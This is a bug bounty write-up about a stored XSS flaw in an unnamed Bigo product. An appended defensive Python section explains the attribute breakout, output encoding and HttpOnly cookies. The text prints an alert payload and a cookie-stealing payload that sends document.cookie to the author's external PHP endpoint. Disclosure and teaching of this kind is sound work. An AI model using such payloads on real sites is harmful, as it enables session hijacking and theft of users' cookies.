($380) XSS STORED in Bigo Bug Bounty Program
Assalamualaikum Bug Hunter and Hallo Everyone.
How are you?
I hope you are all well.
This time I will share a write-up of bug findings in the Bigo Bug Bounty Program.
This discovery began after I managed to find a vulnerability through the Bigo Bug Bounty program. At that time I thought that the vulnerability I had found earlier was either no longer there or had been completely fixed by Bigo SRC. When I had free time, I tried to find it again and check it again. And I got a similar vulnerability as before. Come follow me :D
The vulnerability I found was a stored XSS. Sorry if I don't mention which app these findings are in, because Bigo SRC did not give me permission to name the product in which I found the vulnerability.
And this started when I found a feature that POSTs data from the application to the website.
Then I tried to POST the data from the application by entering the payload:
"><img src=x onerror=alert(document.domain)>
When I looked at the POST data result on the product's official website, the payload was executed :D
I was surprised to see that. Then a pop-up appeared.
I thought maybe this was enough to report to them. So I sent a report to them, and they responded.
Something interesting here: they asked me to take cookies.
Then I tried to fetch cookies with an XSS Hunter payload.
And see, it didn't work: the POST input only allows 120 words.
I was confused: how to get a cookie with a payload of 120 words?
At that time I immediately looked for references from articles on Google and I got the solution, namely XSS cookie stealing.
Here's the reference: Membuat XSS Cookie Stealer | Mukhammad Akbar
"This is a basic Reflected XSS attack to steal cookies from a user of a vulnerable website. The attack string comes from…"
Next I created a PHP file and a TXT file on my hosting.
Final payload:
"><img src=x onerror=this.src='https://herroid1337.000webhostapp.com/m.php?cok='+document.cookie>
And the cookie has been captured.
Then I reported this to them, and finally my report was accepted with HIGH severity.
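As an added example from the defender's side (this is not code from the original post or from Bigo), the following Python shows the two things the write-up turns on: why the first payload breaks out of an HTML attribute when the stored POST value is concatenated into markup without encoding, and why a cookie marked HttpOnly would not have been readable through document.cookie. The input field and the `render_*` functions are assumptions standing in for the unnamed product; the payload string is copied from the post, and the 120 limit is treated as a character count for the length check.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Copy of the first payload quoted in the write-up (straight quotes).
STORED_PAYLOAD = '"><img src=x onerror=alert(document.domain)>'
# Input limit the author reports for the POST field (assumed here to be characters).
POST_LIMIT = 120


def render_unsafe(user_value):
    """Vulnerable pattern: the stored POST value is concatenated into an
    attribute without encoding, so a leading '">' closes the attribute and
    the tag, and whatever follows becomes new markup."""
    return '<input type="text" value="' + user_value + '">'


def render_safe(user_value):
    """Hardened pattern: HTML-encode for the attribute context; the quote and
    angle brackets become entities and stay inside the attribute value."""
    return '<input type="text" value="' + html.escape(user_value, quote=True) + '">'


class TagAudit(HTMLParser):
    """Collects start tags and any on* event-handler attributes a browser
    would see, so both renderings can be compared the way a parser reads them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, _value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))


def audit(markup):
    """Return (tags, event handlers) found in the rendered markup."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers


def fits_limit(payload, limit=POST_LIMIT):
    """A length cap is not an XSS control: the write-up's payload sits well under it."""
    return len(payload) <= limit


def session_cookie_header(name, value):
    """Set-Cookie attributes that keep a session cookie out of document.cookie
    (HttpOnly) and off plaintext or cross-site requests (Secure, SameSite)."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Lax"
    return jar[name].OutputString()


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        tags, handlers = audit(renderer(STORED_PAYLOAD))
        print(f"{label:6}: tags={tags} handlers={handlers}")
    print("payload fits the input limit:", fits_limit(STORED_PAYLOAD))
    print("Set-Cookie:", session_cookie_header("session", "constructed-value"))
```

Run it and the unsafe rendering yields two elements, input and img, with an onerror handler on the second, while the safe rendering yields a single input whose value attribute merely contains the text of the payload. The fix is output encoding at the point where stored data meets HTML; the length limit only shortens the payload the author had to write, and HttpOnly removes the value that the final payload exfiltrated.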
Report : 12/07/2021
Valid : 13/07/2021
Severity : HIGH
Bounty : $380